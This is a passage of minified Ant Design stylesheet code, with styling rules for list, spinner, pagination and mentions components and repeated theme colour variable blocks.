.ant-list:not(.ant-list-vertical) .ant-list-item-no-flex .ant-list-item-action { float: right; } .ant-list-bordered { border: 1px solid #d9d9d9; border-radius: 2px; } .ant-list-bordered .ant-list-header { padding-right: 24px; padding-left: 24px; } .ant-list-bordered .ant-list-footer { padding-right: 24px; padding-left: 24px; } .ant-list-bordered .ant-list-item { padding-right: 24px; padding-left: 24px; } .ant-list-bordered .ant-list-pagination { margin: 16px 24px; } .ant-list-bordered.ant-list-sm .ant-list-item { padding: 8px 16px; } .ant-list-bordered.ant-list-sm .ant-list-header, .ant-list-bordered.ant-list-sm .ant-list-footer { padding: 8px 16px; } .ant-list-bordered.ant-list-lg .ant-list-item { padding: 16px 24px; } .ant-list-bordered.ant-list-lg .ant-list-header, .ant-list-bordered.ant-list-lg .ant-list-footer { padding: 16px 24px; } @media screen and (max-width: 768px) { .ant-list-item-action { margin-left: 24px; } .ant-list-vertical .ant-list-item-extra { margin-left: 24px; } } @media screen and (max-width: 576px) { .ant-list-item { flex-wrap: wrap; } .ant-list-item-action { margin-left: 12px; } .ant-list-vertical .ant-list-item { flex-wrap: wrap-reverse; } .ant-list-vertical .ant-list-item-main { min-width: 220px; } .ant-list-vertical .ant-list-item-extra { margin: auto auto 16px; } } .ant-list-rtl { direction: rtl; text-align: right; } .ant-list-rtl .ReactVirtualized__List .ant-list-item { direction: rtl; } .ant-list-rtl .ant-list-pagination { text-align: left; } .ant-list-rtl .ant-list-item-meta-avatar { margin-right: 0; margin-left: 16px; } .ant-list-rtl .ant-list-item-action { margin-right: 48px; margin-left: 0; } .ant-list.ant-list-rtl .ant-list-item-action > li:first-child { padding-right: 0; padding-left: 16px; } .ant-list-rtl .ant-list-item-action-split { right: auto; left: 0; } .ant-list-rtl.ant-list-vertical .ant-list-item-extra { margin-right: 40px; margin-left: 0; } .ant-list-rtl.ant-list-vertical .ant-list-item-action { margin-right: auto; } .ant-list-rtl .ant-list-vertical .ant-list-item-action > li:first-child { padding-right: 0; padding-left: 16px; } .ant-list-rtl .ant-list:not(.ant-list-vertical) .ant-list-item-no-flex .ant-list-item-action { float: left; } @media screen and (max-width: 768px) { .ant-list-rtl .ant-list-item-action { margin-right: 24px; margin-left: 0; } .ant-list-rtl .ant-list-vertical .ant-list-item-extra { margin-right: 24px; margin-left: 0; } } @media screen and (max-width: 576px) { .ant-list-rtl .ant-list-item-action { margin-right: 22px; margin-left: 0; } .ant-list-rtl.ant-list-vertical .ant-list-item-extra { margin: auto auto 16px; } } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-spin { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; display: none; color: var(--ant-primary-color); text-align: center; vertical-align: middle; opacity: 0; transition: transform 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-spin-spinning { position: static; display: inline-block; opacity: 1; } .ant-spin-nested-loading { position: relative; } .ant-spin-nested-loading > div > .ant-spin { position: absolute; top: 0; left: 0; z-index: 4; display: block; width: 100%; height: 100%; max-height: 400px; } .ant-spin-nested-loading > div > .ant-spin .ant-spin-dot { position: absolute; top: 50%; left: 50%; margin: -10px; } .ant-spin-nested-loading > div > .ant-spin .ant-spin-text { position: absolute; top: 50%; width: 100%; padding-top: 5px; text-shadow: 0 1px 2px #fff; } .ant-spin-nested-loading > div > .ant-spin.ant-spin-show-text .ant-spin-dot { margin-top: -20px; } .ant-spin-nested-loading > div > .ant-spin-sm .ant-spin-dot { margin: -7px; } .ant-spin-nested-loading > div > .ant-spin-sm .ant-spin-text { padding-top: 2px; } .ant-spin-nested-loading > div > .ant-spin-sm.ant-spin-show-text .ant-spin-dot { margin-top: -17px; } .ant-spin-nested-loading > div > .ant-spin-lg .ant-spin-dot { margin: -16px; } .ant-spin-nested-loading > div > .ant-spin-lg .ant-spin-text { padding-top: 11px; } .ant-spin-nested-loading > div > .ant-spin-lg.ant-spin-show-text .ant-spin-dot { margin-top: -26px; } .ant-spin-container { position: relative; transition: opacity 0.3s; } .ant-spin-container::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 10; display: none \9; width: 100%; height: 100%; background: #fff; opacity: 0; transition: all 0.3s; content: ''; pointer-events: none; } .ant-spin-blur { clear: both; opacity: 0.5; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; pointer-events: none; } .ant-spin-blur::after { opacity: 0.4; pointer-events: auto; } .ant-spin-tip { color: rgba(0, 0, 0, 0.45); } .ant-spin-dot { position: relative; display: inline-block; font-size: 20px; width: 1em; height: 1em; } .ant-spin-dot-item { position: absolute; display: block; width: 9px; height: 9px; background-color: var(--ant-primary-color); border-radius: 100%; transform: scale(0.75); transform-origin: 50% 50%; opacity: 0.3; -webkit-animation: antSpinMove 1s infinite linear alternate; animation: antSpinMove 1s infinite linear alternate; } .ant-spin-dot-item:nth-child(1) { top: 0; left: 0; } .ant-spin-dot-item:nth-child(2) { top: 0; right: 0; -webkit-animation-delay: 0.4s; animation-delay: 0.4s; } .ant-spin-dot-item:nth-child(3) { right: 0; bottom: 0; -webkit-animation-delay: 0.8s; animation-delay: 0.8s; } .ant-spin-dot-item:nth-child(4) { bottom: 0; left: 0; -webkit-animation-delay: 1.2s; animation-delay: 1.2s; } .ant-spin-dot-spin { transform: rotate(45deg); -webkit-animation: antRotate 1.2s infinite linear; animation: antRotate 1.2s infinite linear; } .ant-spin-sm .ant-spin-dot { font-size: 14px; } .ant-spin-sm .ant-spin-dot i { width: 6px; height: 6px; } .ant-spin-lg .ant-spin-dot { font-size: 32px; } .ant-spin-lg .ant-spin-dot i { width: 14px; height: 14px; } .ant-spin.ant-spin-show-text .ant-spin-text { display: block; } @media all and (-ms-high-contrast: none), (-ms-high-contrast: active) { /* IE10+ */ .ant-spin-blur { background: #fff; opacity: 0.5; } } @-webkit-keyframes antSpinMove { to { opacity: 1; } } @keyframes antSpinMove { to { opacity: 1; } } @-webkit-keyframes antRotate { to { transform: rotate(405deg); } } @keyframes antRotate { to { transform: rotate(405deg); } } .ant-spin-rtl { direction: rtl; } .ant-spin-rtl .ant-spin-dot-spin { transform: rotate(-45deg); -webkit-animation-name: antRotateRtl; animation-name: antRotateRtl; } @-webkit-keyframes antRotateRtl { to { transform: rotate(-405deg); } } @keyframes antRotateRtl { to { transform: rotate(-405deg); } } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-pagination { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; } .ant-pagination ul, .ant-pagination ol { margin: 0; padding: 0; list-style: none; } .ant-pagination::after { display: block; clear: both; height: 0; overflow: hidden; visibility: hidden; content: ' '; } .ant-pagination-total-text { display: inline-block; height: 32px; margin-right: 8px; line-height: 30px; vertical-align: middle; } .ant-pagination-item { display: inline-block; min-width: 32px; height: 32px; margin-right: 8px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; line-height: 30px; text-align: center; vertical-align: middle; list-style: none; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; outline: 0; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-pagination-item a { display: block; padding: 0 6px; color: rgba(0, 0, 0, 0.85); transition: none; } .ant-pagination-item a:hover { text-decoration: none; } .ant-pagination-item:focus-visible, .ant-pagination-item:hover { border-color: var(--ant-primary-color); transition: all 0.3s; } .ant-pagination-item:focus-visible a, .ant-pagination-item:hover a { color: var(--ant-primary-color); } .ant-pagination-item-active { font-weight: 500; background: #fff; border-color: var(--ant-primary-color); } .ant-pagination-item-active a { color: var(--ant-primary-color); } .ant-pagination-item-active:focus-visible, .ant-pagination-item-active:hover { border-color: var(--ant-primary-5); } .ant-pagination-item-active:focus-visible a, .ant-pagination-item-active:hover a { color: var(--ant-primary-5); } .ant-pagination-jump-prev, .ant-pagination-jump-next { outline: 0; } .ant-pagination-jump-prev .ant-pagination-item-container, .ant-pagination-jump-next .ant-pagination-item-container { position: relative; } .ant-pagination-jump-prev .ant-pagination-item-container .ant-pagination-item-link-icon, .ant-pagination-jump-next .ant-pagination-item-container .ant-pagination-item-link-icon { color: var(--ant-primary-color); font-size: 12px; letter-spacing: -1px; opacity: 0; transition: all 0.2s; } .ant-pagination-jump-prev .ant-pagination-item-container .ant-pagination-item-link-icon-svg, .ant-pagination-jump-next .ant-pagination-item-container .ant-pagination-item-link-icon-svg { top: 0; right: 0; bottom: 0; left: 0; margin: auto; } .ant-pagination-jump-prev .ant-pagination-item-container .ant-pagination-item-ellipsis, .ant-pagination-jump-next .ant-pagination-item-container .ant-pagination-item-ellipsis { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; margin: auto; color: rgba(0, 0, 0, 0.25); font-family: Arial, Helvetica, sans-serif; letter-spacing: 2px; text-align: center; text-indent: 0.13em; opacity: 1; transition: all 0.2s; } .ant-pagination-jump-prev:focus-visible .ant-pagination-item-link-icon, .ant-pagination-jump-next:focus-visible .ant-pagination-item-link-icon, .ant-pagination-jump-prev:hover .ant-pagination-item-link-icon, .ant-pagination-jump-next:hover .ant-pagination-item-link-icon { opacity: 1; } .ant-pagination-jump-prev:focus-visible .ant-pagination-item-ellipsis, .ant-pagination-jump-next:focus-visible .ant-pagination-item-ellipsis, .ant-pagination-jump-prev:hover .ant-pagination-item-ellipsis, .ant-pagination-jump-next:hover .ant-pagination-item-ellipsis { opacity: 0; } .ant-pagination-prev, .ant-pagination-jump-prev, .ant-pagination-jump-next { margin-right: 8px; } .ant-pagination-prev, .ant-pagination-next, .ant-pagination-jump-prev, .ant-pagination-jump-next { display: inline-block; min-width: 32px; height: 32px; color: rgba(0, 0, 0, 0.85); font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; line-height: 32px; text-align: center; vertical-align: middle; list-style: none; border-radius: 2px; cursor: pointer; transition: all 0.3s; } .ant-pagination-prev, .ant-pagination-next { font-family: Arial, Helvetica, sans-serif; outline: 0; } .ant-pagination-prev button, .ant-pagination-next button { color: rgba(0, 0, 0, 0.85); cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-pagination-prev:hover button, .ant-pagination-next:hover button { border-color: var(--ant-primary-5); } .ant-pagination-prev .ant-pagination-item-link, .ant-pagination-next .ant-pagination-item-link { display: block; width: 100%; height: 100%; padding: 0; font-size: 12px; text-align: center; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; outline: none; transition: all 0.3s; } .ant-pagination-prev:focus-visible .ant-pagination-item-link, .ant-pagination-next:focus-visible .ant-pagination-item-link, .ant-pagination-prev:hover .ant-pagination-item-link, .ant-pagination-next:hover .ant-pagination-item-link { color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-pagination-disabled, .ant-pagination-disabled:hover, .ant-pagination-disabled:focus-visible { cursor: not-allowed; } .ant-pagination-disabled .ant-pagination-item-link, .ant-pagination-disabled:hover .ant-pagination-item-link, .ant-pagination-disabled:focus-visible .ant-pagination-item-link { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; cursor: not-allowed; } .ant-pagination-slash { margin: 0 10px 0 5px; } .ant-pagination-options { display: inline-block; margin-left: 16px; vertical-align: middle; } @media all and (-ms-high-contrast: none) { .ant-pagination-options *::-ms-backdrop, .ant-pagination-options { vertical-align: top; } } .ant-pagination-options-size-changer.ant-select { display: inline-block; width: auto; } .ant-pagination-options-quick-jumper { display: inline-block; height: 32px; margin-left: 8px; line-height: 32px; vertical-align: top; } .ant-pagination-options-quick-jumper input { position: relative; display: inline-block; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ width: 50px; height: 32px; margin: 0 8px; } .ant-pagination-options-quick-jumper input::-moz-placeholder { opacity: 1; } .ant-pagination-options-quick-jumper input:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-pagination-options-quick-jumper input::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-pagination-options-quick-jumper input:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-pagination-options-quick-jumper input:-ms-input-placeholder { text-overflow: ellipsis; } .ant-pagination-options-quick-jumper input:placeholder-shown { text-overflow: ellipsis; } .ant-pagination-options-quick-jumper input:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-pagination-options-quick-jumper input:focus, .ant-pagination-options-quick-jumper input-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-pagination-options-quick-jumper input-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-pagination-options-quick-jumper input-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-pagination-options-quick-jumper input[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-pagination-options-quick-jumper input[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-pagination-options-quick-jumper input-borderless, .ant-pagination-options-quick-jumper input-borderless:hover, .ant-pagination-options-quick-jumper input-borderless:focus, .ant-pagination-options-quick-jumper input-borderless-focused, .ant-pagination-options-quick-jumper input-borderless-disabled, .ant-pagination-options-quick-jumper input-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-pagination-options-quick-jumper input { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-pagination-options-quick-jumper input-lg { padding: 6.5px 11px; font-size: 16px; } .ant-pagination-options-quick-jumper input-sm { padding: 0px 7px; } .ant-pagination-simple .ant-pagination-prev, .ant-pagination-simple .ant-pagination-next { height: 24px; line-height: 24px; vertical-align: top; } .ant-pagination-simple .ant-pagination-prev .ant-pagination-item-link, .ant-pagination-simple .ant-pagination-next .ant-pagination-item-link { height: 24px; background-color: transparent; border: 0; } .ant-pagination-simple .ant-pagination-prev .ant-pagination-item-link::after, .ant-pagination-simple .ant-pagination-next .ant-pagination-item-link::after { height: 24px; line-height: 24px; } .ant-pagination-simple .ant-pagination-simple-pager { display: inline-block; height: 24px; margin-right: 8px; } .ant-pagination-simple .ant-pagination-simple-pager input { box-sizing: border-box; height: 100%; margin-right: 8px; padding: 0 6px; text-align: center; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; outline: none; transition: border-color 0.3s; } .ant-pagination-simple .ant-pagination-simple-pager input:hover { border-color: var(--ant-primary-color); } .ant-pagination-simple .ant-pagination-simple-pager input:focus { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); } .ant-pagination-simple .ant-pagination-simple-pager input[disabled] { color: rgba(0, 0, 0, 0.25); background: #f5f5f5; border-color: #d9d9d9; cursor: not-allowed; } .ant-pagination.mini .ant-pagination-total-text, .ant-pagination.mini .ant-pagination-simple-pager { height: 24px; line-height: 24px; } .ant-pagination.mini .ant-pagination-item { min-width: 24px; height: 24px; margin: 0; line-height: 22px; } .ant-pagination.mini .ant-pagination-item:not(.ant-pagination-item-active) { background: transparent; border-color: transparent; } .ant-pagination.mini .ant-pagination-prev, .ant-pagination.mini .ant-pagination-next { min-width: 24px; height: 24px; margin: 0; line-height: 24px; } .ant-pagination.mini .ant-pagination-prev .ant-pagination-item-link, .ant-pagination.mini .ant-pagination-next .ant-pagination-item-link { background: transparent; border-color: transparent; } .ant-pagination.mini .ant-pagination-prev .ant-pagination-item-link::after, .ant-pagination.mini .ant-pagination-next .ant-pagination-item-link::after { height: 24px; line-height: 24px; } .ant-pagination.mini .ant-pagination-jump-prev, .ant-pagination.mini .ant-pagination-jump-next { height: 24px; margin-right: 0; line-height: 24px; } .ant-pagination.mini .ant-pagination-options { margin-left: 2px; } .ant-pagination.mini .ant-pagination-options-size-changer { top: 0px; } .ant-pagination.mini .ant-pagination-options-quick-jumper { height: 24px; line-height: 24px; } .ant-pagination.mini .ant-pagination-options-quick-jumper input { padding: 0px 7px; width: 44px; height: 24px; } .ant-pagination.ant-pagination-disabled { cursor: not-allowed; } .ant-pagination.ant-pagination-disabled .ant-pagination-item { background: #f5f5f5; border-color: #d9d9d9; cursor: not-allowed; } .ant-pagination.ant-pagination-disabled .ant-pagination-item a { color: rgba(0, 0, 0, 0.25); background: transparent; border: none; cursor: not-allowed; } .ant-pagination.ant-pagination-disabled .ant-pagination-item-active { background: #e6e6e6; } .ant-pagination.ant-pagination-disabled .ant-pagination-item-active a { color: rgba(0, 0, 0, 0.25); } .ant-pagination.ant-pagination-disabled .ant-pagination-item-link { color: rgba(0, 0, 0, 0.25); background: #f5f5f5; border-color: #d9d9d9; cursor: not-allowed; } .ant-pagination-simple.ant-pagination.ant-pagination-disabled .ant-pagination-item-link { background: transparent; } .ant-pagination.ant-pagination-disabled .ant-pagination-item-link-icon { opacity: 0; } .ant-pagination.ant-pagination-disabled .ant-pagination-item-ellipsis { opacity: 1; } .ant-pagination.ant-pagination-disabled .ant-pagination-simple-pager { color: rgba(0, 0, 0, 0.25); } @media only screen and (max-width: 992px) { .ant-pagination-item-after-jump-prev, .ant-pagination-item-before-jump-next { display: none; } } @media only screen and (max-width: 576px) { .ant-pagination-options { display: none; } } .ant-pagination-rtl .ant-pagination-total-text { margin-right: 0; margin-left: 8px; } .ant-pagination-rtl .ant-pagination-item, .ant-pagination-rtl .ant-pagination-prev, .ant-pagination-rtl .ant-pagination-jump-prev, .ant-pagination-rtl .ant-pagination-jump-next { margin-right: 0; margin-left: 8px; } .ant-pagination-rtl .ant-pagination-slash { margin: 0 5px 0 10px; } .ant-pagination-rtl .ant-pagination-options { margin-right: 16px; margin-left: 0; } .ant-pagination-rtl .ant-pagination-options .ant-pagination-options-size-changer.ant-select { margin-right: 0; margin-left: 8px; } .ant-pagination-rtl .ant-pagination-options .ant-pagination-options-quick-jumper { margin-left: 0; } .ant-pagination-rtl.ant-pagination-simple .ant-pagination-simple-pager { margin-right: 0; margin-left: 8px; } .ant-pagination-rtl.ant-pagination-simple .ant-pagination-simple-pager input { margin-right: 0; margin-left: 8px; } .ant-pagination-rtl.ant-pagination.mini .ant-pagination-options { margin-right: 2px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-mentions { box-sizing: border-box; margin: 0; font-variant: tabular-nums; list-style: none; font-feature-settings: 'tnum'; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ position: relative; display: inline-block; height: auto; padding: 0; overflow: hidden; line-height: 1.5715; white-space: pre-wrap; vertical-align: bottom; } .ant-mentions::-moz-placeholder { opacity: 1; } .ant-mentions:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-mentions::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-mentions:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-mentions:-ms-input-placeholder { text-overflow: ellipsis; } .ant-mentions:placeholder-shown { text-overflow: ellipsis; } .ant-mentions:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-mentions:focus, .ant-mentions-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-mentions-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-mentions-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-mentions[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-mentions[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-mentions-borderless, .ant-mentions-borderless:hover, .ant-mentions-borderless:focus, .ant-mentions-borderless-focused, .ant-mentions-borderless-disabled, .ant-mentions-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-mentions { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-mentions-lg { padding: 6.5px 11px; font-size: 16px; } .ant-mentions-sm { padding: 0px 7px; } .ant-mentions-disabled > textarea { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-mentions-disabled > textarea:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-mentions-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-mentions > textarea, .ant-mentions-measure { min-height: 30px; margin: 0; padding: 4px 11px; overflow: inherit; overflow-x: hidden; overflow-y: auto; /* stylelint-disable declaration-block-no-redundant-longhand-properties */ font-weight: inherit; font-size: inherit; font-family: inherit; font-style: inherit; font-variant: inherit; font-size-adjust: inherit; font-stretch: inherit; line-height: inherit; /* stylelint-enable declaration-block-no-redundant-longhand-properties */ direction: inherit; letter-spacing: inherit; white-space: inherit; text-align: inherit; vertical-align: top; word-wrap: break-word; word-break: inherit; -moz-tab-size: inherit; -o-tab-size: inherit; tab-size: inherit; } .ant-mentions > textarea { width: 100%; border: none; outline: none; resize: none; /* 